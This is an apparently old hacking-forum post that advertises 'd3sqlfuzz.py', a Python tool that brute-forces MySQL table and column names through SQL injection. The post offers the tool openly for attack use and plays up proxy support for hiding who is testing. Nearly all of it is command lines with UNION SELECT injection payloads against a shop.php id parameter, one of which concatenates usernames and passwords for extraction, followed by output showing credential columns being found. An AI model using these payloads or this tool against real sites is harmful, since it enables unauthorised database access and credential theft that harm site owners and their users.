SQL Table/Column Fuzz
Extremely well thought out table and column enumeration python script which can test tables, columns or both. In combination also allows for proxy support to obfuscate who is actually testing the remote MySQL database.
This works the same way as the Table Fuzzer, setup your tables, columns, fix your errors and for the target site argument place a TABLE, COLUMN or both for whichever you want to test. Users need to be careful when setting up the particular error given away by the target database as sometimes syntax errors occur with unknown columns, the ability to search using multiple errors is also to be included in the tool.
It is available from here. (registration required - I advise you do and regularly check). It will also be available from the main site http://darkc0de.com
Testing Columns and Tables:
d3hydr8@linuxbox:~> python d3sqlfuzz.py "http://www.somesite.com/shop.php?id=41 +and+1=2+union+all+select+1,2,3,COLUMN,null,6,7,8,9,10,11,12,13,14+from+TABLE --"
[+] Tables Loaded: 9
[+] Columns Loaded: 7
[+] Fuzzing Tables & Columns
[+] Table user Column: user
[-] Error Received
[+] Table user Column: username
[-] Error Received
[+] Table user Column: password
[-] Error Received
[+] Table user Column: passwd
[-] Error Received
[+] Table user Column: pass
[-] Error Received
[+] Table user Column: id
[-] Error Received
[+] Table user Column: email
[-] Error Received
[+] Table users Column: user
[-] Error Received
[+] Table users Column: username
[-] Error Received
[+] Table users Column: password
[-] Error Received
[+] Table users Column: passwd
[-] Error Received
[+] Table users Column: pass
[-] Error Received
[+] Table users Column: id
[-] Error Received
[+] Table users Column: email
[-] Error Received
[+] Table adminrights Column: user
[!] Combo Found: adminrights user
[+] Table adminrights Column: username
[!] Combo Found: adminrights username
[+] Table adminrights Column: password
[!] Combo Found: adminrights password
[+] Table adminrights Column: passwd
[!] Combo Found: adminrights passwd
[+] Table adminrights Column: pass
[!] Combo Found: adminrights pass
[+] Table adminrights Column: id
[!] Combo Found: adminrights id
[+] Table adminrights Column: email
[!] Combo Found: adminrights email
[+] Table username Column: user
[-] Error Received
[+] Table username Column: username
[-] Error Received
[+] Table username Column: password
[-] Error Received
[+] Table username Column: passwd
[-] Error Received
[+] Table username Column: pass
[-] Error Received
[+] Table username Column: id
[-] Error Received
[+] Table username Column: email
[-] Error Received
[+] Table usernames Column: user
[-] Error Received
[+] Table usernames Column: username
[-] Error Received
[+] Table usernames Column: password
[-] Error Received
[+] Table usernames Column: passwd
[-] Error Received
[+] Table usernames Column: pass
[-] Error Received
[+] Table usernames Column: id
[-] Error Received
[+] Table usernames Column: email
[-] Error Received
[+] Table admin Column: user
[-] Error Received
[+] Table admin Column: username
[-] Error Received
[+] Table admin Column: password
[-] Error Received
[+] Table admin Column: passwd
[-] Error Received
[+] Table admin Column: pass
[-] Error Received
[+] Table admin Column: id
[-] Error Received
[+] Table admin Column: email
[-] Error Received
[+] Table administrator Column: user
[-] Error Received
[+] Table administrator Column: username
[-] Error Received
[+] Table administrator Column: password
[-] Error Received
[+] Table administrator Column: passwd
[-] Error Received
[+] Table administrator Column: pass
[-] Error Received
[+] Table administrator Column: id
[-] Error Received
[+] Table administrator Column: email
[-] Error Received
[+] Table login Column: user
[-] Error Received
[+] Table login Column: username
[-] Error Received
[+] Table login Column: password
[-] Error Received
[+] Table login Column: passwd
[-] Error Received
[+] Table login Column: pass
[-] Error Received
[+] Table login Column: id
[-] Error Received
[+] Table login Column: email
[-] Error Received
[+] Table perdorues Column: user
[-] Error Received
[+] Table perdorues Column: username
[-] Error Received
[+] Table perdorues Column: password
[-] Error Received
[+] Table perdorues Column: passwd
[-] Error Received
[+] Table perdorues Column: pass
[-] Error Received
[+] Table perdorues Column: id
[-] Error Received
[+] Table perdorues Column: email
[-] Error Received
[-] Done
Testing Just Tables:
d3hydr8@linuxbox:~> python d3sqlfuzz.py "http://www.somesite.com/shop.php?id=41+ and+1=2+union+all+select+1,2,3,concat(username,char(58),password),null,6,7,8,9, 10,11,12,13,14+from+TABLE--"
[+] Tables Loaded: 9
[+] Columns Loaded: 7
[+] Fuzzing Tables
[+] Testing: user
[-] Error Received
[+] Testing: users
[-] Error Received
[+] Testing: adminrights
[!] Table Found: adminrights
[+] Testing: username
[-] Error Received
[+] Testing: usernames
[-] Error Received
[+] Testing: admin
[-] Error Received
[+] Testing: administrator
[-] Error Received
[+] Testing: login
[-] Error Received
[+] Testing: perdorues
[-] Error Received
[-] Done
Testing Just Columns:
d3hydr8@linuxbox:~> python d3sqlfuzz.py "http://www.somesite.com/shop.php?id=41+ and+1=2+union+all+select+1,2,3,COLUMN,null,6,7,8,9,10,11,12,13,14+from+ adminrights--"
[+] Tables Loaded: 9
[+] Columns Loaded: 7
[+] Fuzzing Columns
[+] Testing: user
[-] Error Received
[+] Testing: username
[!] Column Found: username
[+] Testing: password
[!] Column Found: password
[+] Testing: passwd
[-] Error Received
[+] Testing: pass
[-] Error Received
[+] Testing: id
[!] Column Found: id
[+] Testing: email
[-] Error Received
[-] Done
Testing with Proxy Support:
d3hydr8@linuxbox:~> python d3sqlfuzz.py "http://www.somesite.com/shop.php?id=41+ and+1=2+union+all+select+1,2,3,COLUMN,null,6,7,8,9,10,11,12,13,14+from+ adminrights--"
[+] Testing Proxy...
[+] Proxy: 58.97.1.24:8080
[+] Building Handler
[+] Tables Loaded: 9
[+] Columns Loaded: 7
[+] Fuzzing Columns
[+] Testing: user
[-] Error Received
[+] Testing: username
[!] Column Found: username
[+] Testing: password
[!] Column Found: password
[+] Testing: passwd
[-] Error Received
[+] Testing: pass
[-] Error Received
[+] Testing: id
[!] Column Found: id
[+] Testing: email
[-] Error Received
[-] Done
|